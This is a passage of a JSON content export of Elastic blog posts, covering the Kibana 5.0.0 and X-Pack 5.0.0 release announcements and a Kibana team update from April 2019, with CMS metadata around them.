Released","updated_at":"2024-11-08T00:39:25.374Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/elastic-stack-5-0-0-released","publish_details":{"time":"2024-11-08T00:40:57.547Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt228c541b02ad2cd7","_version":2,"locale":"en-us","ACL":{},"abstract_l10n":"","author":["blt717d62571a49ab4e"],"body_l10n":"\u003cp\u003eIt is with a profound sense of pride that we announce the official release of Kibana 5.0.0.\u003c/p\u003e\u003cp\u003eIn the lead up to this moment, we've compared Kibana to sliced bread, repurposed 14th-century poetry, and have even drawn parallels between our pre-release process and the First World War. Was this all over the top? Definitely. Was some of it in poor taste? Probably.\u003c/p\u003e\u003cp\u003eBut it was done with love, and we're positively thrilled to finally deliver it to you all today.\u003c/p\u003e\u003cp\u003eKibana 5.0.0 requires Elasticsearch 5.0.0, and you can try it out on \u003ca href=\"/cloud\"\u003eElastic Cloud\u003c/a\u003e today.\u003c/p\u003e\u003cp\u003eHead on over to the \u003ca href=\"/downloads/kibana\"\u003edownload page\u003c/a\u003e to check out the release, read up on the \u003ca href=\"https://www.elastic.co/guide/en/kibana/5.0/release-notes-5.0.0.html\"\u003erelease notes\u003c/a\u003e, or feast your eyes on some highlights:\u003c/p\u003e\u003ch3\u003eA brand new design\u003c/h3\u003e\u003cp\u003eA great visualization tool deserves a great design, and now Kibana's design is finally up to snuff. The color scheme in general was refreshed from the ground up, and we sought to take advantage of the maximum possible screen real estate without sacrificing the accessibility of the UI.\u003c/p\u003e\u003cp\u003eOh, and we got rid of those stupid borders. You know the ones we're talking about. Seriously, who puts borders on widgets in a dashboard? Not us… anymore.\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://api.contentstack.io/v2/assets/5807e82f8331b7c15e4c2ea3/download?uid=blt2d6c527d2050e9dd\" alt=\"Kibana dashboard\"/\u003e\u003c/p\u003e\u003ch3\u003eTime series data, meet Timelion\u003c/h3\u003e\u003cp\u003eAfter months being relegated to {re}search status, Timelion is now a part of Kibana core.\u003c/p\u003e\u003cp\u003eFor those unfamiliar, Timelion is a visualization tool with a query DSL that lets you ask interesting questions over time:\u003c/p\u003e\u003cul\u003e\u003cli\u003eHow many pages does each unique user hit over time?\u003c/li\u003e\u003cli\u003eWhat’s the difference between this Friday and last Friday?\u003c/li\u003e\u003cli\u003eWhat is the cumulative sum of all searches made in the last 2 years?\u003c/li\u003e\u003c/ul\u003e\u003cp\u003eThese are the types of questions that Timelion was made for. And did I mention that the charts themselves are beautiful?\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://api.contentstack.io/v2/assets/5807e55d8331b7c15e4c2ae7/download?uid=blt3b27b68b38f75067\" alt=\"Timelion dashboard\"/\u003e\u003c/p\u003e\u003ch3\u003eConsole, the best way to build custom Elasticsearch queries\u003c/h3\u003e\u003cp\u003eSense is now Console, and it now ships with Kibana core.\u003c/p\u003e\u003cp\u003eConsole is like cURL if cURL came with out of the box request/response formatting, autocompleted Elasticsearch API syntax, and remembered your previous requests. In other words, Console is nothing like cURL, and that was a terrible analogy.\u003c/p\u003e\u003cp\u003eConsole uses the same configuration details as Kibana, so make your free-form requests to Elasticsearch without worrying about custom headers or the like.\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://api.contentstack.io/v2/assets/5810b14f7e0434354491eebf/download?uid=blt3e85dcb3ff739ece\" alt=\"Console in Dev Tools\"/\u003e\u003c/p\u003e\u003ch3\u003ePainless scripted fields\u003c/h3\u003e\u003cp\u003eYou can now choose the language of your scripted fields. In addition to the existing Lucene expression support, you can choose any scripting language that is configured in your Elasticsearch cluster. This means you can even use the brand new Painless scripting language that ships with Elasticsearch 5.0. Painless works a lot like Groovy, but we’ve put extra care into making it more secure.\u003c/p\u003e\u003ch3\u003eX-Pack\u003c/h3\u003e\u003cp\u003eWant out of the box monitoring for your Elasticsearch and Kibana nodes? How about first-class authentication and security controls or the ability to create PDF reports of your Kibana visualizations? You can try all of these things in Kibana 5.0 with a single CLI command.\u003c/p\u003e\u003cp\u003eCheck out the dedicated \u003ca href=\"/blog/x-pack-5-0-0-released\"\u003eX-Pack post\u003c/a\u003e for more details.\u003c/p\u003e\u003ch3\u003eUpgrade from Kibana 4\u003c/h3\u003e\u003cp\u003eAssuming you're not relying on deprecated Elasticsearch functionality, your searches, visualizations, and dashboards from Kibana 4.6 should continue to work in Kibana 5.0. Just \u003ca href=\"https://www.elastic.co/guide/en/kibana/5.0/upgrade-standard.html\"\u003eupgrade\u003c/a\u003e and go.\u003c/p\u003e\u003cp\u003eStuck on Kibana 4.1? No problem! We have a \u003ca href=\"https://www.elastic.co/guide/en/kibana/5.0/upgrade-standard-reindex.html\"\u003e4.1 upgrade path\u003c/a\u003e for you as well.\u003c/p\u003e\u003ch3\u003ePrevious posts\u003c/h3\u003e\u003cp\u003eIf you're so inclined, peruse the blog posts for the various pre-releases to check out even more of the features in Kibana 5.0.0:\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003ca href=\"/blog/kibana-5-0-0-rc1\"\u003eKibana 5.0.0-rc1\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"/blog/kibana-5-0-0-beta1\"\u003eKibana 5.0.0-beta1\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"/blog/elastic-stack-release-5-0-0-alpha-5\"\u003eKibana 5.0.0-alpha5\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"/blog/kibana-5-0-0-alpha4\"\u003eKibana 5.0.0-alpha4\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"/blog/kibana-5-0-0-alpha3\"\u003eKibana 5.0.0-alpha3\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"/blog/kibana-5-0-0-alpha2\"\u003eKibana 5.0.0-alpha2\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"/blog/kibana-5-0-0-alpha1\"\u003eKibana 5.0.0-alpha1\u003c/a\u003e\u003c/li\u003e\u003c/ul\u003e\u003ch3\u003eThanks for all of the help!\u003c/h3\u003e\u003cp\u003eWe didn't make Kibana 5.0 happen all on our own. Our endless thanks to all of those that tried out the pre-releases and submitted bug reports, pull requests, and excellent feedback to help make this the best Kibana release to date.\u003c/p\u003e\u003cp\u003eNow what are you waiting for? Head to the \u003ca href=\"/downloads/kibana\"\u003edownload page\u003c/a\u003e and start using Kibana 5.0.0 today!\u003c/p\u003e","callout":[],"category":[{"uid":"bltfaae4466058cc7d6","_version":8,"locale":"en-us","ACL":{},"created_at":"2018-08-27T12:47:03.147Z","created_by":"sys_blt57a423112de8a853","key":"releases","label_l10n":"Product release","tags":[],"title":"Product release","updated_at":"2024-05-10T13:44:16.955Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-05-10T13:44:53.629Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"created_at":"2019-04-01T11:47:34.375Z","created_by":"sys_blt57a423112de8a853","disclaimer":[],"full_bleed_image":{"uid":"blt29843bb98ba59a2a","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2018-10-11T05:37:11.833Z","updated_at":"2018-10-11T05:37:11.833Z","content_type":"image/jpeg","file_size":"71803","filename":"blog-kibana-banner.jpg","title":"blog-kibana-banner.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-04-18T15:49:05.384Z","user":"sys_blt57a423112de8a853"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt29843bb98ba59a2a/5bbee187eb7e90a514e6e46b/blog-kibana-banner.jpg"},"markdown_l10n":"","publish_date":"2016-10-26T16:05:00.000Z","sanity_migration_complete":false,"seo":{"seo_title_l10n":"Kibana 5.0.0 released","seo_description_l10n":"We're thrilled to announce the immediate release of Kibana 5.0.0.","canonical_tag":"","noindex":false},"tags":[],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[],"tags_event_type":[],"tags_industry":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"uid":"blt16cbd128ae1218a1","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2018-10-11T05:37:09.151Z","updated_at":"2018-10-11T05:37:09.151Z","content_type":"image/png","file_size":"56269","filename":"blog-kibana-thumb.png","title":"blog-kibana-thumb.png","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-04-30T19:59:05.130Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt16cbd128ae1218a1/5bbee185560fdc4d0c8e69b4/blog-kibana-thumb.png"},"title":"Kibana 5.0.0 released","title_l10n":"Kibana 5.0.0 released","updated_at":"2024-11-08T00:24:05.398Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/kibana-5-0-0-released","publish_details":{"time":"2024-11-08T00:31:10.687Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltcf75ddab3a030a33","_version":4,"locale":"en-us","ACL":{},"abstract_l10n":"","author":["blta88061c105b8011d"],"body_l10n":"\u003cp\u003eAlongside the 5.0 release of the Elastic Stack, we are excited to introduce the world to X-Pack — a single extension that provides security, alerting, monitoring, reporting and graph capabilities across the Elastic Stack. X-Pack is the evolution of - and replacement for - the standalone plugins Shield, Watcher, Marvel, Reporting, and Graph. While we loved these individual plugins, we were running out of clever names and were beginning to struggle with an increasingly complex, 15+ step installation and configuration process.\u003c/p\u003e\n\u003cp\u003eAs the name literally says, X-Pack is a “pack,” and it is the first of its kind. A pack is a simple, but important concept - it is a single zip that contains extensions for one or more products in the Elastic Stack. And thanks to our aligned version numbers and release train, it’s now easy to build and test extensions that bring UI components to Kibana, new APIs to Elasticsearch, and so much more. We hope you go forth and build interesting packs of your own, but before you do, there’s a lot more to know about X-Pack!\u003c/p\u003e\n\u003ch2\u003eInstallation \u0026amp; Configuration\u003c/h2\u003e\n\u003cp\u003eWe spent a lot of time thinking about ways we could make it easier to install and configure. The install process is now just two commands, and you are ready to get started with the full range of X-Pack functionality.\u003c/p\u003e\u003cpre class=\"prettyprint prettyprinted\"\u003ebin/elasticsearch-plugin install x-pack\u003cbr /\u003ebin/kibana-plugin install x-pack\u003c/pre\u003e\n\u003cp\u003eAs part of the installation process, we automatically create two native users - elastic, an admin account, and kibana which is a service account used by the Kibana backend. These users are created with a default password of changeme, which the Kibana backend will use by default. This means that there is absolutely no configuration necessary when you’re just getting started.\u003c/p\u003e\n\u003cp\u003eOf course, before you go into production, you will need to change the default passwords, and configure SSL, but even that is now easier and more consistent across the stack.\u003c/p\u003e\n\u003ch2\u003eSecurity\u003c/h2\u003e\n\u003cp\u003eCreating and managing security in the Elastic Stack just got a whole lot easier. X-Pack builds on the capabilities introduced in Shield, which include authentication, role-based access control, encrypted communication, audit logging, and login and session support for Kibana.\u003c/p\u003e\n\u003cp\u003eNewly added with X-Pack 5.0 is a management UI in Kibana for creating and managing both users and roles:\u003c/p\u003e\n\u003cp\u003e\u003cimg asset_uid=\"blt021c581a68f46748\" src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt021c581a68f46748/5bbdf1d57498f42b0c1a6716/blog-x-pack-1.jpg\" alt=\"blog-x-pack-1.jpg\" height=\"auto\" /\u003e\u003c/p\u003e\n\n\u003cp\u003e\u003ca href=\"/products/x-pack/security\"\u003eLearn More\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eAlerting\u003c/h2\u003e\n\u003cp\u003eX-Pack alerting features build on the capabilities of Watcher, as a highly-available alerting engine that runs inside Elasticsearch and is configured via APIs.\u003c/p\u003e\n\u003cp\u003eCreating an alert involves specifying 4 simple parameters - a schedule, query, condition, and one or more notification actions, such as email, Slack, HipChat, PagerDuty, or a webhook.\u003c/p\u003e\n\u003cp\u003eX-Pack 5.0 adds a number of new options, including the ability to specify a condition per-action, which makes it easier to send different types of notifications at different thresholds. For example, if application response times exceed SLAs for 1 minute, use a webhook to create a ticket for the ops team to look into tomorrow. If the response times exceed SLAs for 30 minutes, it’s time to page someone.\u003c/p\u003e\n\u003cp\u003eFun fact - the API still uses the term Watcher, out of respect for the many use-cases beyond alerting that it enables.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"/products/x-pack/alerting\"\u003eLearn More\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eMonitoring\u003c/h2\u003e\n\u003cp\u003eX-Pack has a goal of providing monitoring capabilities for the entire Elastic Stack. With Marvel, we introduced the most effective monitoring tool for Elasticsearch, and X-Pack 5.0 expands this to include monitoring for Kibana:\u003c/p\u003e\n\u003cp\u003e\u003cimg asset_uid=\"blt435a2e8062275cba\" src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt435a2e8062275cba/5bbdf1d8eb7e90a514e6e33f/blog-x-pack-2.png\" alt=\"blog-x-pack-2.png\" height=\"auto\" /\u003e\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"/products/x-pack/monitoring\"\u003eLearn More\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eReporting\u003c/h2\u003e\n\u003cp\u003eX-Pack makes it easy to create and share PDFs of Kibana visualizations and dashboards. Combine reporting with alerting capabilities to send periodic screenshots of dashboards to users that don’t have direct access to Kibana, or attach supporting information to the notification emails triggered by X-Pack alerts.\u003c/p\u003e\n\u003cp\u003e\u003cimg asset_uid=\"blt8d3431499eebc771\" src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt8d3431499eebc771/5bbeda56eb7e90a514e6e3fd/blog-xpack-print.jpg\" alt=\"blog-xpack-print.jpg\" height=\"auto\" /\u003e\u003c/p\u003e\n\n\u003ch2\u003eGraph\u003c/h2\u003e\n\u003cp\u003eX-Pack provides a new way to explore your data with the graph API and UI. Rather than summarizing, slicing, and dicing the properties of your documents, Graph lets you ask questions in terms of the entities (the machines, services, people, bands, etc) and how they are related to one another. In X-Pack 5.0, you can now save and share graph workspaces, and it’s even easier to drill down and see the raw documents that support a given relationship, or link directly to Kibana dashboards or 3rd party systems.\u003c/p\u003e\n\u003cp\u003e\u003cimg asset_uid=\"blt32f1e816c9ae139d\" src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt32f1e816c9ae139d/5bbdf1df117bd0dc7fcc611a/blog-x-pack-4.png\" alt=\"blog-x-pack-4.png\" height=\"auto\" /\u003e\u003c/p\u003e\n\n\u003ch2\u003eConclusion\u003c/h2\u003e\n\u003cp\u003eNow that you know what X-Pack is all about, go give it a try! X-Pack features are included in our \u003ca href=\"/subscriptions\"\u003esubscriptions\u003c/a\u003e, but we are excited to make the X-Pack monitoring features available for free with a \u003ca href=\"/subscriptions\"\u003eBasic license\u003c/a\u003e. Feel free to reach out to us via the contact button in the top-right, or start a discussion on discuss.elastic.co!\u003c/p\u003e","callout":[],"category":[{"uid":"bltfaae4466058cc7d6","_version":8,"locale":"en-us","ACL":{},"created_at":"2018-08-27T12:47:03.147Z","created_by":"sys_blt57a423112de8a853","key":"releases","label_l10n":"Product release","tags":[],"title":"Product release","updated_at":"2024-05-10T13:44:16.955Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-05-10T13:44:53.629Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"created_at":"2019-04-01T11:56:02.844Z","created_by":"sys_blt57a423112de8a853","disclaimer":[],"full_bleed_image":{"uid":"blta438a7af03589cc4","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2018-10-11T05:10:21.910Z","updated_at":"2018-10-11T05:10:21.910Z","content_type":"image/jpeg","file_size":"74214","filename":"blog-x-pack-banner.jpg","title":"blog-x-pack-banner.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-05-02T23:27:13.132Z","user":"blt3e52848e0cb3c394"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blta438a7af03589cc4/5bbedb3d560fdc4d0c8e6958/blog-x-pack-banner.jpg"},"markdown_l10n":"","publish_date":"2016-10-26T16:02:00.000Z","sanity_migration_complete":false,"seo":{"seo_title_l10n":"X-Pack 5.0.0 Released","seo_description_l10n":"Alongside the 5.0 release of the Elastic Stack, we are excited to introduce the world to X-Pack.","canonical_tag":"","noindex":false},"tags":[],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[],"tags_event_type":[],"tags_industry":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"uid":"blta053a53f023ccc57","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2018-10-11T05:10:18.877Z","updated_at":"2018-10-11T05:10:18.877Z","content_type":"image/jpeg","file_size":"44869","filename":"blog-x-pack-thumb.jpg","title":"blog-x-pack-thumb.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-05-02T23:27:13.132Z","user":"blt3e52848e0cb3c394"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blta053a53f023ccc57/5bbedb3a6c9763b95d07abdc/blog-x-pack-thumb.jpg"},"title":"X-Pack 5.0.0 Released","title_l10n":"X-Pack 5.0.0 Released","updated_at":"2024-11-07T00:27:13.602Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/x-pack-5-0-0-released","publish_details":{"time":"2024-11-07T00:32:30.563Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltf09398f6ea0cbb42","_version":3,"locale":"en-us","ACL":{},"abstract_l10n":"","author":["blt85b0e579ed18da50"],"body_l10n":"\u003ch2\u003eKibana UI Update April 15\u003c/h2\u003e\n\u003cp\u003e7.0 is out! You can find the blog\u0026nbsp;with the information \u003ca href=\"https://www.elastic.co/blog/kibana-7-0-0-released\"\u003ehere\u003c/a\u003e. Meanwhile, the Kibana\u0026nbsp;team is already busy working towards the future releases.\u003cspan\u003e\u003c/span\u003e\u003c/p\u003e\n\u003ch3\u003eAnd we're still hiring!\u003c/h3\u003e\n\u003cul\u003e\n \u003cli\u003e\u003ca href=\"https://www.elastic.co/about/careers/product-management/jobs/1571633\"\u003eDirector / Sr Director Product Management - Kibana\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e\u003ca href=\"https://www.elastic.co/about/careers/kibana/jobs/1533855\"\u003eKibana - UI/Front End Team Lead\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e\u003ca href=\"https://www.elastic.co/about/careers/kibana/jobs/1292795\"\u003eKibana Platform - Principal JavaScript Engineer\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e\u003ca href=\"https://www.elastic.co/about/careers/kibana/jobs/1143849\"\u003eKibana - Senior JavaScript Engineer\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e\u003ca href=\"https://www.elastic.co/about/careers/kibana/jobs/1292707\"\u003eKibana - Senior Security Developer (JavaScript)\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e\u003ca href=\"https://www.elastic.co/about/careers/kibana/jobs/1292795\"\u003eKibana - Platform Javascript Engineer (Node.js)\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e\u003ca href=\"https://www.elastic.co/about/careers/kibana/jobs/1595759\"\u003eKibana - Software Engineer - Operations\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e\u003ca href=\"https://www.elastic.co/about/careers/kibana/jobs/1418186\"\u003eKibana - Visualisations \u0026amp; Vega Engineer\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cp\u003eFeature Control\u003c/p\u003e\n\u003cp\u003eThe feature controls PR has been merged to master and 7.x. For an overview of what this provides, this \u003ca href=\"https://github.com/elastic/kibana/issues/20277\"\u003eissue\u003c/a\u003e is the best source of information while we actively work on the end-user and developer facing documentation. There are a few minor enhancements we’re actively working on, including the addition of “read only badges” to further alert the user that they’re looking at a read-only view of an application.\u003c/p\u003e\n\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltf7afce26b89a5b33/blt6d929aa1ce91599a/5cb4ea0a791abe5a29a1d22c/download\" data-sys-asset-uid=\"blt6d929aa1ce91599a\" alt=\"image14.gif\" /\u003e\u003c/p\u003e\n\u003cp\u003e\u003cbr /\u003e\u003c/p\u003e\n\u003cp\u003eSecret Service:\u0026nbsp;Aleh has been making great progress on the secret service, and a draft PR is available \u003ca href=\"https://github.com/elastic/kibana/pull/34526\"\u003ehere\u003c/a\u003e. Some work is still left to be done, and tests are still a work in progress.\u003c/p\u003e\n\u003ch3\u003ePlatform\u003c/h3\u003e\n\u003cp\u003eNew Platform:\u0026nbsp;We are preparing infrastructure for plugins (Security is the first in the list) \u0026nbsp;to extend HTTP service with custom functionality.\u003c/p\u003e\n\u003ch3\u003eOperation\u003c/h3\u003e\n\u003cp\u003eGenerate dockerfiles target to be used for elastic/dockerfiles \u003ca href=\"https://github.com/elastic/kibana/pull/32169\"\u003e#32169\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eGeo-Maps App\u003c/h3\u003e\n\u003cp\u003eDid you miss ThomasN \u0026amp; AlexF’s webinar on Elastic Maps last week? Be sure to catch the recording @ \u003ca href=\"https://www.elastic.co/webinars/elastic-maps-for-geospatial-analysis\"\u003eElastic Maps for Geospatial Analysis\u003c/a\u003e. We provide a good overview of the basic functionality the Maps app offers, build a \u003ca href=\"https://media.giphy.com/media/2CcKiHPDsJqVi/giphy.gif\"\u003epew pew\u003c/a\u003e map out of ECS Suricata events and dive into some future features with NYC taxi collision data. Already saw the webinar and want to play around with the data set and map? It’s all readily available in \u003ca href=\"https://github.com/alexfrancoeur/elastic_maps_examples/tree/master/elastic_maps_webinar\"\u003eAlexF’s example repo\u003c/a\u003e.\u003c/p\u003e\n\u003ch3\u003e\n \u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltf7afce26b89a5b33/blt91d30a28949d149b/5cb4f404791abe5a29a1d266/download\" data-sys-asset-uid=\"blt91d30a28949d149b\" alt=\"image15.png\" /\u003e\u003c/p\u003e\n\u003c/h3\u003e\n\u003ch3\u003eKibana App (Visualizations, Sharing, Discover, Reporting)\u003cbr /\u003e\u003c/h3\u003e\n\u003ch4\u003eElastic-Charts\u003c/h4\u003e\n\u003cp\u003eThis week we released the functionality to allow line annotation hiding any tooltips to mimic the current time marker feature in vislib.\u003c/p\u003e\n\u003cp\u003eThe legend now shows the last bucket value along with the series name. Hovering over a bar/area/line will display the relative value both on the tooltip and on the legend.\u003c/p\u003e\n\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltf7afce26b89a5b33/bltf78ad5f0eb5b34ea/5cb4f03c30313775298d6414/download\" data-sys-asset-uid=\"bltf78ad5f0eb5b34ea\" alt=\"image6.gif\" /\u003e\u003c/p\u003e\n\u003cp\u003eEach series can now be sorted using a sortIndex props on each series. We will work to implement sorting also at bucket level, a feature that is currently available on ES but not on vislib.\u003c/p\u003e\n\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltf7afce26b89a5b33/blt25ea4f26b7ab9f31/5cb4f04fe06ed87a29f2d98b/download\" data-sys-asset-uid=\"blt25ea4f26b7ab9f31\" alt=\"image12.png\" /\u003e\u003c/p\u003e\n\u003cp\u003eBand area charts are now available for areas and bars (it works similar to a candlestick chart but it doesn’t have the same features). We are working to add upper and lower series names to the tooltip and legend.\u003c/p\u003e\n\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltf7afce26b89a5b33/bltaa2cb05c9c81297d/5cb4f19bb790c01122391b77/download\" data-sys-asset-uid=\"bltaa2cb05c9c81297d\" alt=\"image16.png\" /\u003e\u003c/p\u003e\n\u003cp\u003eAnimations are disabled starting from 3.10.1 until we find the right way to morph lines between two dataset of different length.\u003c/p\u003e\n\u003ch4\u003e\n \u003ch3\"\u003eReporting\u003c/h3\"\u003e\n\u003c/h4\u003e\n\u003cp\u003eWork continued on our Export to CSV.\u0026nbsp;We’re in the process of engaging Cloud and other teams so that there’s no surprises when we launch.\u003cbr /\u003eWe also discovered a bug in how puppeteer handles async actions. The solution will hopefully reduce the number of “Timeout waiting for selector…” errors to appear.\u003cbr /\u003eLastly, Tim has condensed our internal queue’s querying for jobs from 4 calls down to just one! This means we’ve reduced our footprint and, hopefully, reduced the amount of resources needed on both Kibana and ElasticSearch!\u0026nbsp;\u003c/p\u003e\n\u003ch3\u003eCanvas\u003c/h3\u003e\n\u003ch4\u003eUnder the bonnet - layout engine integration rework\u003c/h4\u003e\n\u003cp\u003eWe’ve \u003ca href=\"https://github.com/elastic/kibana/pull/33702\"\u003erefactored\u003c/a\u003e integration code, shed 100s of code lines and Redux lock-in (no thunks!) while accidentally fixing 5 bugs (and maybe adding some). It unblocks new features eg. \u003ca href=\"https://github.com/elastic/kibana/pull/32995\"\u003ebox select\u003c/a\u003e:\u003c/p\u003e\n\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltf7afce26b89a5b33/blt3a3f815e084c8e5a/5cb4f464869b38322286ae4c/download\" data-sys-asset-uid=\"blt3a3f815e084c8e5a\" alt=\"image5.gif\" /\u003e\u003c/p\u003e\n\u003cp\u003eIt’s now possible to statically render workbooks without layout engine code. The React component structure is leaner, only the currently edited page has event handlers. Proceeding with TypeScript type tests and annotations is aided by simpler data and leaner code as well.\u003c/p\u003e\n\u003ch4\u003eMore adventures in dynamic layout land\u003c/h4\u003e\n\u003cp\u003eExperiments in data driven layouting continue with three new functions (with terrible names). The first is similar to repeatElement, the difference is that this new layoutElements allows you to completely control, via the position function, the height, width, position and rotation of elements generated from a data table.\u003c/p\u003e\n\u003cp\u003eThe next function, positionElement allows you to statically position one or more elements within a container. Of course since this is Canvas, nothing has to be static, and you can use data to control their positioning and styling. This is fun because it allows for reusing a datasource across multiple elements, something we’ve wanted to do for awhile. Here’s a pretty contrived, but fun, example of \u0026nbsp;all this\u003c/p\u003e\n\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltf7afce26b89a5b33/blt14d9bfc6d7eaa95f/5cb4f0aae16629da239c3369/download\" data-sys-asset-uid=\"blt14d9bfc6d7eaa95f\" alt=\"image2.gif\" /\u003e\u003c/p\u003e\n\u003cp\u003eIn this gif the trees are a timeseries of the average speed of airplanes near the Phoenix office, layoutElements is used to determine the height of the trees. This is actually generating a positionElement which contains both an image of a tree, as well as the speed the tree represents, and then determining the height of the container using the data.\u003c/p\u003e\n\u003cp\u003eThe position of the purple planes in the sky is determined by the speed of planes near the Phoenix office and the position of the sun is determined by the seconds of the current minute\u003c/p\u003e\n\u003cp\u003eThe animations are handled by the support for custom CSS that Canvas already has.\u003c/p\u003e\n\u003cp\u003eIf you really want to mess with this stuff, and I’m not suggesting you do, there’s a Kibana plugin that only works on master in \u003ca href=\"https://github.com/rashidkpc/canvas-dynamic-layout\"\u003ethis github repo\u003c/a\u003e\u003c/p\u003e\n\u003ch4\u003e\u003ca href=\"https://github.com/rashidkpc/canvas-dynamic-layout\"\u003e\u003cbr /\u003e\u003c/a\u003eFilter grouping works!\u003c/h4\u003e\n\u003cp\u003eAnd filters work much better too. Joe cleaned up a ton of issues we didn’t know existed in Canvas’s filter functionality, and implemented the ability for filters to exist in groups. That means that time filters no longer have to be global! No filter has to be global! You can tie specific elements, or even specific parts of an expression to one or more filter controls. Here’s a quick screenshot..\u003c/p\u003e\n\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltf7afce26b89a5b33/blt3adde9ec019a233f/5cb4f0e0c6bfc2312293ad7a/download\" data-sys-asset-uid=\"blt3adde9ec019a233f\" alt=\"image8.gif\" /\u003e\u003c/p\u003e\n\u003ch4\u003eLoading……………… Content.\u003c/h4\u003e\n\u003cp\u003eOur crack design team has been keeping busy with designing new templates to give Canvas users a F-A-S-T start when creating new Canvases. \u0026nbsp;We’ve been working on two for now, a presentation template and a report template. The report template is aimed at C-Level creators to dynamically update reports with data.\u003c/p\u003e\n\u003ch3\u003eDesign\u003c/h3\u003e\n\u003ch4\u003eDocs and styling for Elastic Charts\u003c/h4\u003e\n\u003cp\u003eOne of our 7.1 goals is to get some basic documentation and styling for Elastic Charts in EUI. We’re currently working on styling the charts along with some quick snippet code to get people started. The idea here is that the Storybook docs the charts team put together can serve more as a reference, where the EUI examples can serve more as design guidelines and a chart gallery for actual solutions.\u003c/p\u003e\n\n\u003ch4\u003eEUI TypeScript conversion\u003c/h4\u003e\n\u003cp\u003ene thing we continually hear from people is they want us to prioritize TypeScript conversion (2 out of every 3 devs marked this as important). \u003ca href=\"https://github.com/elastic/eui/issues/1557\"\u003eWe’ve made good progress during 7.1\u003c/a\u003e, even getting PRs from the community outside of Elastic and will continue to chip away at it.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eUntil\u0026nbsp;next week\u003c/strong\u003e\u0026nbsp;\u003cbr /\u003e\u003cstrong\u003e- Kibana 